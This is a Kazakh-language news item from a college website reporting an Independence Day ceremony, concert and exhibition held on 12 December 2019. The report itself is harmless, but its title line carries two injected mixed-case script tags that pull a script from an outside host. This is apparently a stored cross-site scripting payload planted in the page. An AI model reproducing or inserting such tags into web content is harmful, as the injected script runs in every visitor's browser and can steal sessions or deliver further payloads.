Қазақстан Республикасының Тәуелсіздік күні<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.12.2019

 

  

12 желтоқсанда "№8 Агротехникалық колледжі" КММ-де Қазақстан Республикасының Тәуелсіздік күніне арналған салтанатты іс-шара өтті. Салтанатты ашылу барысында ҚР Әнұраны шырқалып, Қазақстанның тарихы мен табиғаты туралы бейнероликтер көрсетілді.

Іс-шара мерекелік концертпен жалғасты. Колледж студенттері өздерінің би, вокалдық қабілеттерін, сондай-ақ мәнерлеп оқу шеберліктерін көрсетті.

Іс-шараның арнайы қонағы біздің жерлесіміз, түрлі республикалық және халықаралық вокалдық байқаулардың  қатысушысы және жүлдегері Бейбарыс Айтмугамбетов болды.

Сонымен қатар, Тәуелсіздік күніне орай колледжде фойеде тақырыптық көрме ұйымдастырылды.

Тәуелсіздік күні аясында колледждің 1 курс студенттері аудандық, балалар және жасөспірімдер кітапханасы ұйымдастырған іс-шараға қатысып,сондай-ақ, Бөгенбай батыр атындағы аудандық тарихи-өлкетану мұражайына барып, еліміздің тәуелсіздігін алу тарихы туралы көптеген пайдалы ақпарат алды.

Просмотров: 450


Пікір қосу



Деректерді қолтаңбаға қосу